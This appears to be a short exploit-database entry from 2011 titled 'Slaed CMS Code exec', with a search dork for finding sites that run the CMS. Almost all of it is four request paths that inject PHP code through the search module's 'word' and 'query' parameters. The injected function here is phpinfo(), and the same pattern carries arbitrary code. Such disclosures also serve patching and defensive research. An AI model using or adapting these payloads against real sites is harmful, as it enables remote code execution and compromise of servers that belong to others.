"Powered by SLAED CMS"

  • 日期:2011-09-12
  • 类别:
  • 作者:anonymous
  • 语法:"Powered by SLAED CMS"
  • Exploit Title: Slaed CMS Code exec

    On different versions of this software next vulnerabilities are availible:

    /index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view

    /index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

    OR:

    /search.html?mod=&word={${phpinfo()}}&query=ok&to=view

    /search.html?mod=&word=ok&query={${phpinfo()}}&to=view